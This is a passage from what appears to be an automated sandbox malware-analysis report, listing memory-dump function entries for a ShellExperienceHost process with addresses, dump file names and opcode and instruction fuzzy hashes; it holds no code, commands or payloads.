Opcode Fuzzy Hash: dff32f4965680dd14f69c1366c20c656f0d1561fa82e33a36fef895df2ab2765
Instruction Fuzzy Hash: 1D215E71918A4DCFDF89EF18C459AAD7BF0FF68345F0505AAE809D7291DB34A990CB80

Function 00007FF848F33354 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ad6affea844db75dff42b581b5e4d08742890fbe0f0fc560010f91b224bf1ed
Instruction ID: 1c2a478552191b8d399be74bc345f1aa31a0f2afe6823e9c85903cb01db02a81
Opcode Fuzzy Hash: 7ad6affea844db75dff42b581b5e4d08742890fbe0f0fc560010f91b224bf1ed
Instruction Fuzzy Hash: A421D23084D78A8FE742EB7888585E97FF0EF5B301F0945EBD048CB0A2DA29A54AC751

Function 00007FF848F47121 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d6a780fcb46a7826d38772b233d96b7e5032fff666ff2ae92e479f851d7f60f
Instruction ID: b7c79b00e0826c63ba53dea9a3eb8415c833ef234a1525d6bbbf3f30189e6b92
Opcode Fuzzy Hash: 6d6a780fcb46a7826d38772b233d96b7e5032fff666ff2ae92e479f851d7f60f
Instruction Fuzzy Hash: A8117230D0CA4E9FEB98EF2884592BD7BA0FFA8741F0005BBD40AD21D2DB35A544CB40

Function 00007FF848F42AE8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac315eebf377373ff2a0a6f7788e8a678773275aaf6a05f64e22c9c323fe62ce
Instruction ID: 6b2fbf34688da53605b053b6f9447a83175df5605b28e40fbbdd014198163fa2
Opcode Fuzzy Hash: ac315eebf377373ff2a0a6f7788e8a678773275aaf6a05f64e22c9c323fe62ce
Instruction Fuzzy Hash: 0D11AF3084D7894FEB07AB6088251B97BA0EF26344F0600FBD409CB0E3DB795589C365

Function 00007FF848F44BF5 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec9df75e0a1389e5bb0f06aaef37ca15eb18146a341c4c6b363d4bee903e2a4
Instruction ID: b459be931b324a02788d840b8f99fe48c97fe3f67600bfb5dab8a966e48278be
Opcode Fuzzy Hash: dec9df75e0a1389e5bb0f06aaef37ca15eb18146a341c4c6b363d4bee903e2a4
Instruction Fuzzy Hash: 36115C30C0EA4A9FEB89EF6884592B97BA0FF68345F0405BBD419E6592DB35A480CB41

Function 00007FF848F428E1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355444674a96beade871a06dba62b6953116e6b6afcb2c30ffbdf9bcaabf1d23
Instruction ID: c227ea70422b005f568eb92135a4a7da4eca15ea7d9cc190b667db6a470bd5fc
Opcode Fuzzy Hash: 355444674a96beade871a06dba62b6953116e6b6afcb2c30ffbdf9bcaabf1d23
Instruction Fuzzy Hash: CE117C7090C6498FDB49EF14C8961E97BE1FF68755F1101BFE80AD3291DB38A540CB85

Function 00007FF848F47265 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a8f9fbe9433eadbcc8b5b9df6683bffef53aff75185eb6d9c4674e4cb7196db
Instruction ID: 4e7034abb022b66e98480f4abbb6d6a73e31daeb1b4efb67bc9fd1bffe779103
Opcode Fuzzy Hash: 8a8f9fbe9433eadbcc8b5b9df6683bffef53aff75185eb6d9c4674e4cb7196db
Instruction Fuzzy Hash: 7D119D31D0DA4E8FEB59EF24849A2B87BE0FF26701F0400BAE009D65D2DB296644CB65

Function 00007FF848F471C5 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b39c9d35087083bd05ef458fbb04d94ad3544e81fcbe27d00f05fe586684e8
Instruction ID: 50e079165532ee7609ee51e881c076eb73cc3b1b89b77a070b114aa777c47b5c
Opcode Fuzzy Hash: e5b39c9d35087083bd05ef458fbb04d94ad3544e81fcbe27d00f05fe586684e8
Instruction Fuzzy Hash: 32119A3080CA4E9FEB99EF2884592B97BE1FF68341F0005BFD419D6192DB38A580CB50

Function 00007FF848F45095 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab0bb07f34d3b6a267074ed5f7346b14b2f036163f67224294b2f9ccc0cfbf4
Instruction ID: 1b0ef8c1f6163b6dd99b829570f25ee437fe1d45126490bd2f72388fce767de1
Opcode Fuzzy Hash: 6ab0bb07f34d3b6a267074ed5f7346b14b2f036163f67224294b2f9ccc0cfbf4
Instruction Fuzzy Hash: 1711B271D0DA8A8FE799FB24946A2B87BA0FF69740F0400BFC00AD64D2DB296444C645

Function 00007FF848F3CE60 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d70c65481989c0bed189c1419e8cdcc79a31adb157e6028495d2dbade0d913
Instruction ID: fc072712065f3bb7ef23b8e5f880f5ee1efed692219d5be606a703dbdbaaf990
Opcode Fuzzy Hash: b4d70c65481989c0bed189c1419e8cdcc79a31adb157e6028495d2dbade0d913
Instruction Fuzzy Hash: A4118F3180D68D8EEB96FB2898581B97BB0FF19341F0404BBD419C71D2EB7465A0C754

Function 00007FF848F44B59 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb539cfe899fb727c98d75468438c06e486cf1e4b230a02536b90d7aa712646
Instruction ID: a45b82cba5fd5afd74b30b13283a9d0d82e5f2b27b4e78353e1f7d6ddc825f6f
Opcode Fuzzy Hash: 4eb539cfe899fb727c98d75468438c06e486cf1e4b230a02536b90d7aa712646
Instruction Fuzzy Hash: 1521903090DA8E9FEB89EF2888592B97BA1FF69346F0405BFD409E75D2DB386444C741

Function 00007FF848F3CDD7 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b36d455e6fea511b9fe230c19acdd11cd0b0339186cdd6ad451f07e441ef7f
Instruction ID: d8d0c9e362fb4220a9bb3560aab3f4c1e829b5e1d51ee1db376285be5e4be0c2
Opcode Fuzzy Hash: 40b36d455e6fea511b9fe230c19acdd11cd0b0339186cdd6ad451f07e441ef7f
Instruction Fuzzy Hash: 5611E33190D79A8EEB56BF6898141FA7BB0FF06251F04007BD848C70E2EB345464CB84

Function 00007FF848F45409 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4d9a12534f7b802279ac5db3e01cd4f2dd2b48fb585273477807250779b06a0
Instruction ID: a3319797121b0c9ca509738e9640717be050eafacced85ba8dae61460318a95d
Opcode Fuzzy Hash: f4d9a12534f7b802279ac5db3e01cd4f2dd2b48fb585273477807250779b06a0
Instruction Fuzzy Hash: 6511603090D68E9FEB85FB2488692B97BF0FF29342F0405BBD419DA1E2DB386554C711

Function 00007FF848F42CD1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c38b7b95a42ac831ff7c4bac81ee177e9614bd442ea7b29f840ae0b82869c1
Instruction ID: 2e0966cc5468fb2b347d32876370a763caf6455069c7efedcb18091870ac16a0
Opcode Fuzzy Hash: b5c38b7b95a42ac831ff7c4bac81ee177e9614bd442ea7b29f840ae0b82869c1
Instruction Fuzzy Hash: 2D116D3480D54E9FEB82BBA8848C6F9BBF0FF69341F0409B7D408D7096EB78A5848744

Function 00007FF848F334E1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 903ba012b8a290fead7fc83304f027b02d75875f803a2e4b78d40f5bfda9c301
Instruction ID: de91a2d40e93a960e19edb0dab2ccf8637405d9de7e66fab420664564f4085d6
Opcode Fuzzy Hash: 903ba012b8a290fead7fc83304f027b02d75875f803a2e4b78d40f5bfda9c301
Instruction Fuzzy Hash: D611397090868E8FDB89EF68C8596BA7BA0FF18341F0409BAD41AC61D2DB35A540C704

Function 00007FF848F412B1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea5716980507713ca7a771fca0cee17c68634166a7522ecb636e80fc25850e0
Instruction ID: c2acaf9e030957479c7a95bd6a41e19160d1f4b8e6320d84c857df28e9c99bd3
Opcode Fuzzy Hash: 6ea5716980507713ca7a771fca0cee17c68634166a7522ecb636e80fc25850e0
Instruction Fuzzy Hash: 78115B7094C65E8FEB85EB2884696B9BBE0FF28341F4004BBD41AD65D1EB75A580C744

Function 00007FF848F472FD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 531a39b7dafafb01b7235c8611d74d3cd6eb992d576d4ee90715f441e892bdfe
Instruction ID: a4a42f986fb4a8ae504cda9531b40ded55ac4d4bcb5d9446c7dc3a7940667af7
Opcode Fuzzy Hash: 531a39b7dafafb01b7235c8611d74d3cd6eb992d576d4ee90715f441e892bdfe
Instruction Fuzzy Hash: BD11917090DA4E8FEB99FF24C4596BA7BA0FF68340F0441BBD809D61D2DB35A5448781

Function 00007FF848F47851 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c5d8e2f16f4cec967d658577c72fcc820d9eb0545071337f672a428f266d39
Instruction ID: da9fcd0c7cfb9f47b31a8a8752ad8757a0cb04e2d5e6d6e832c50a8e1406c85d
Opcode Fuzzy Hash: 89c5d8e2f16f4cec967d658577c72fcc820d9eb0545071337f672a428f266d39
Instruction Fuzzy Hash: 0D115E3090D94E9FE751FB68C8896AA7BF4FF29341F2404B7D409D7191DB38A144C755

Function 00007FF848F451BD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed4c21b38b608b24e18bb19b132a2890e18cb0137f163788bc41ef5869db752
Instruction ID: cac4c7c54186415c1c9639a018fa683184cd57886858ca4d285fb357a4466c94
Opcode Fuzzy Hash: 6ed4c21b38b608b24e18bb19b132a2890e18cb0137f163788bc41ef5869db752
Instruction Fuzzy Hash: A2118C70C0D64A8FEB89FB64C4592BEBBA0FF69740F0405BBD41AE61D2DB39A584C711

Function 00007FF848F44EE5 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d758d8d981d9045283692b6e61403f3d884e60c23878b95f21b3e50567324d0a
Instruction ID: 6bef3a26af86ecc9faa270dfba447bc376e2e43f308f24fd01cbbdefecf9c54e
Opcode Fuzzy Hash: d758d8d981d9045283692b6e61403f3d884e60c23878b95f21b3e50567324d0a
Instruction Fuzzy Hash: 3911AC30D0E68A9EE791FB68885D6B97AE0FF28365F0404B7C41CE7092EB38A4808701

Function 00007FF848F464A9 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3b45add4993583514760e9466ed95fc4f4791e12561a47a375d6eaac800032
Instruction ID: 721945df67045b19ed8a4db50f58151c5ff41b36f80ee2e79bfd2cd5f5795b1a
Opcode Fuzzy Hash: 7b3b45add4993583514760e9466ed95fc4f4791e12561a47a375d6eaac800032
Instruction Fuzzy Hash: A8118F30D0D68A8FFB81FB6488596B97BF0FF29340F0404B7C408D70A6EB38A5948B55

Function 00007FF848F3BEF5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0248a85f20cd966874ece8a02eb76d7988f1146cce03ff04a3354ded878098
Instruction ID: 7386f13d0c3e3c2640f0ccf36359d48e228454c73dc37680a6592905ad5d8a45
Opcode Fuzzy Hash: cb0248a85f20cd966874ece8a02eb76d7988f1146cce03ff04a3354ded878098
Instruction Fuzzy Hash: 1E01887082CA4A8FE741FB7488592E97BE0FF18341F0558B6E40CC61E2EB38A4848B04

Function 00007FF848F4537D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb8c92c9d9892bf38a5f71f8399a3cd2336063581ee0f3203bce3077505b6a06
Instruction ID: 6fefd810e1b7288d9fa23b85c1cc69d34f1b4c316a4b380fe0bfd0db6caf8b6b
Opcode Fuzzy Hash: fb8c92c9d9892bf38a5f71f8399a3cd2336063581ee0f3203bce3077505b6a06
Instruction Fuzzy Hash: 17119E3180DA8A9FEB49FB2484596B9BBE1FF28344F0404BBD41AD65D2DB79B540C741

Function 00007FF848F32E81 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a3e3a42dc7f7886c27187b9c5cf39ada6640222073c45333efeadbb18edaed
Instruction ID: 6d8741b30b8629431415e9631227b4984d740d2e4516512a62392ea26fdedb28
Opcode Fuzzy Hash: e4a3e3a42dc7f7886c27187b9c5cf39ada6640222073c45333efeadbb18edaed
Instruction Fuzzy Hash: F901783191D68E8FE751FBA8888A6A97BE0FF59342F0544B7D40CC71A2EB38E4848714

Function 00007FF848F42771 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f525ba5d20a1c1425d125b5057fdb35b14bdc3e641083848b087223dc61ad7f2
Instruction ID: cebde367dad599217deacc7dd7804a24cbc17f75b9db4f83a0e799d2103b464a
Opcode Fuzzy Hash: f525ba5d20a1c1425d125b5057fdb35b14bdc3e641083848b087223dc61ad7f2
Instruction Fuzzy Hash: 6D01B13094D64A8FDB49EF64C4696BE7BA1FF29344F6504BFE40AD60D2DB35A580C740

Function 00007FF848F305D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af7b96e5672d4bfa006daef6dddc81cb47330269758fe97ca30347dc3b93fc0
Instruction ID: 3e22cb97f566f725d054b2ccdc3bd5f3d6cc704cb4b510d666f99c71e6e19810
Opcode Fuzzy Hash: 0af7b96e5672d4bfa006daef6dddc81cb47330269758fe97ca30347dc3b93fc0
Instruction Fuzzy Hash: 3B019E3090890E8FEB48EF64C4596BAB7A1FF58386F10447EE40EC21D0CB31A590CB44

Function 00007FF848F3C15A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e27a3512dc7d5b1fcd97af221a1b06208ad8c5c4a311a03c3d53fca95d4927c
Instruction ID: 1aa36359539842f09a31624939f7d33b42b82b8d70abd00a787133805773d9c7
Opcode Fuzzy Hash: 2e27a3512dc7d5b1fcd97af221a1b06208ad8c5c4a311a03c3d53fca95d4927c
Instruction Fuzzy Hash: 58014830918A4E9EEB99FF6884582BDBAE0FF18341F50047BD81AC2191EB71A560C744

Function 00007FF848F479D9 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d50a0e9fe9f72803e5b1454da00c5bf66a2febe285ce8092d44cab06978dfca
Instruction ID: d68dea446e09c257e720fbab7882b6eed564b9d840dde78d4592153c8d913ac8
Opcode Fuzzy Hash: 8d50a0e9fe9f72803e5b1454da00c5bf66a2febe285ce8092d44cab06978dfca
Instruction Fuzzy Hash: 3501BC3185EA8E8FE752BB3888995A97BE0FF29740F0508B3D408D70E2EB28E5448701

Function 00007FF848F3285D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df24e8418ed193a768e824037728e87ffbe9435fb8c1855e8208ba477e45ec2f
Instruction ID: ac96556b6273c4f6c7f8e25df049037e43e1cd956d858e03169e2a4a77080f6b
Opcode Fuzzy Hash: df24e8418ed193a768e824037728e87ffbe9435fb8c1855e8208ba477e45ec2f
Instruction Fuzzy Hash: FB018B3090D64E9FE791FB68848D6B97BE0FF59342F5544B7D408C60A2EF38E0448704

Function 00007FF848F32EF9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195a48cab6b0e7d7eab7a70178ee0758d09834cd1d51f586afaa2880cb2ee9e7
Instruction ID: 33f19e2150a5437ee5043d860e2bd8bc85ed4b4c8d72675c34205ddc6fc1c6ad
Opcode Fuzzy Hash: 195a48cab6b0e7d7eab7a70178ee0758d09834cd1d51f586afaa2880cb2ee9e7
Instruction Fuzzy Hash: 63018F31D1D6898FE742BB7488595A97FE0EF5A341F0A04F7D408CB0E6EF38A4548711

Function 00007FF848F31CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07eb91ffe01a84519d5700677f56201e3f27ac035af0eb69775eac53b967e110
Instruction ID: 6eb8b10fbf862a956b6f5fe2ad671d80144273816781a5dcba1723c8543c0806
Opcode Fuzzy Hash: 07eb91ffe01a84519d5700677f56201e3f27ac035af0eb69775eac53b967e110
Instruction Fuzzy Hash: 0201AF3080D68E8FEB99EF6488592FA7BA1FF55341F4414BEE808C22D2DB75D590C744

Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f71ad91dbcbae29036199fcf164b7c91693443d48c4fc3ad60820341949f027f
Instruction ID: b3ab6964d25e2b05089aa1937083d84e1180e296cd8a9c396f8e610ed562580c
Opcode Fuzzy Hash: f71ad91dbcbae29036199fcf164b7c91693443d48c4fc3ad60820341949f027f
Instruction Fuzzy Hash: E8016930819A0E9EEB49FB64C4582BAB6A2FF18346F10087EE41EC21D1DF35A590CA54

Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847c0d24203983371b0ecce8c61e47b00d876fbfc98a9c455f79ce77523c6c81
Instruction ID: f5bca77d50112248a5f8eb5b5273fc89507356a210411df58f091a3a5ac6d1c1
Opcode Fuzzy Hash: 847c0d24203983371b0ecce8c61e47b00d876fbfc98a9c455f79ce77523c6c81
Instruction Fuzzy Hash: B2016930919A0E9FEB49EB6484582BAB6A0FF18346F20087FE40EC21D1DF35A550C604

Function 00007FF848F42EB8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7651c1242937bb129378545d690f173221bb8ac8700c4a4ff052b399b3421b
Instruction ID: 39350636fe22ff4858031d5cbaba7e092e66b0a76bcdd4863f307703a1f74b93
Opcode Fuzzy Hash: cd7651c1242937bb129378545d690f173221bb8ac8700c4a4ff052b399b3421b
Instruction Fuzzy Hash: 1E014274D1892D8FEBA4FB6888957A8B6B1FB59340F5051AAD00DE3292DF3459858B04

Function 00007FF848F47BA0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610c0e24363747e512c9196676b00ae39ea590edeb9f5b6547d6ae3d16c314ca
Instruction ID: 4af960bc637a5040965757e3a93a3ec34fb95cfe1292e643b46b900898b4b282
Opcode Fuzzy Hash: 610c0e24363747e512c9196676b00ae39ea590edeb9f5b6547d6ae3d16c314ca
Instruction Fuzzy Hash: FE11F370D0861ACFEB28AF95D4943FCBAB0AF18361F14413AE019B22C1DB785489CF19

Function 00007FF848F3AF0A Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae6b5b6c9aa1fb27560929273c9a8ae0816b71a618b78e66cccba0a67a01f45
Instruction ID: 93838456789d27c58d819d88af170bfd5a609a2a04e3e21e4815edfce6010042
Opcode Fuzzy Hash: 8ae6b5b6c9aa1fb27560929273c9a8ae0816b71a618b78e66cccba0a67a01f45
Instruction Fuzzy Hash: 01F0497095C90E9FEB51FB3884495BABAE0EF18381F0508B3E40DC60A5EF34A5948644

Function 00007FF848F305D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862da456ab318e7007a7b6c8fab8f83fa113c411c35f857156df9146cbc3536b
